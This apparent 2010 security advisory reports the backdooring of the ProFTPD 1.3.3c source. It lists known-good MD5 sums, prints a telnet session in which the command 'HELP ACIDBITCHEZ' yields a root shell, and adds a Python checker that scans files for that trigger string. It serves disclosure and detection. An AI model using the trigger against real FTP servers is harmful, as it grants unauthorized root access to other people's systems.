
December 3, 2010

ProFTPD 1.3.3c Briefly Backdoored by Hackers

The servers of the widely used FTP server ProFTPD were compromised (probably with a 0day) on the 28th of November 2010. During the attack, some source code was modified to insert a backdoor. The source files affected were those for ProFTPD version 1.3.3c, between 28/11/2010 and 02/12/2010.

The backdoor introduced by the attackers allows unauthenticated users remote root access to systems which run the maliciously modified version of the ProFTPD daemon.

If you installed or updated ProFTPD from one of the official mirrors during that time, it is recommended that you recompile from a known good version of the code. The source modification was spotted and rectified on 01/12/2010. MD5 sums for the valid source tarballs:

8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2

4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz

The session below shows how the backdoor is triggered. A Metasploit module is available to automate the exploit.

$ telnet 0 21
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [127.0.0.1]
HELP
214-The following commands are recognized (* =>'s unimplemented):
CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV
EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD
XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP
NOOP    FEAT    OPTS    AUTH*   CCC*    CONF*   ENC*    MIC*
PBSZ*   PROT*   TYPE    STRU    MODE    RETR    STOR    STOU
APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST
NLST    STAT    SITE    MLSD    MLST
214 Direct comments to someone@somewhere
HELP ANOOP
502 Unknown command 'ANOOP'
HELP a
502 Unknown command 'A'
HELP ACIDBITCHEZ
id ;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

The original backdoor source modifications can be seen in this patch.
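
To check a host that may have pulled the modified source, the following added example (not part of the original post or of ProFTPD) compares a downloaded tarball against the MD5 sums published above and scans a directory for the trigger string from the session. It assumes the trigger string appears literally in the modified source or the compiled daemon; the command-line paths are hypothetical.

```python
import hashlib
import sys
from pathlib import Path

# Known-good MD5 sums exactly as published in the post above.
KNOWN_GOOD_MD5 = {
    "proftpd-1.3.3c.tar.bz2": "8571bd78874b557e98480ed48e2df1d2",
    "proftpd-1.3.3c.tar.gz": "4f2c554d6273b8145095837913ba9e5d",
}
# HELP argument that triggers the backdoor in the session shown in the post.
TRIGGER = b"ACIDBITCHEZ"

def md5_of(path, chunk=1 << 20):
    """Stream a file through MD5 so large tarballs are not read into memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def check_tarball(path):
    """Return 'ok', 'mismatch' or 'unknown' (file name not in the published list)."""
    expected = KNOWN_GOOD_MD5.get(Path(path).name)
    if expected is None:
        return "unknown"
    return "ok" if md5_of(path) == expected else "mismatch"

def contains_trigger(path, chunk=1 << 20):
    """True if the trigger occurs in the file, even split across read boundaries."""
    tail = b""
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            window = tail + block
            if TRIGGER in window:
                return True
            tail = window[-(len(TRIGGER) - 1):]
    return False

def scan_tree(root):
    """List files under root (source tree or install prefix) holding the trigger."""
    return sorted(str(p) for p in Path(root).rglob("*")
                  if p.is_file() and contains_trigger(p))

if __name__ == "__main__":
    # Usage (hypothetical paths): python check.py <tarball> <dir-to-scan>
    print("tarball:", check_tarball(sys.argv[1]))
    for hit in scan_tree(sys.argv[2]):
        print("trigger string found in", hit)
```

A "mismatch" on a tarball fetched during the affected window, or any hit from the directory scan, is the cue to rebuild from a known good copy as recommended above.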
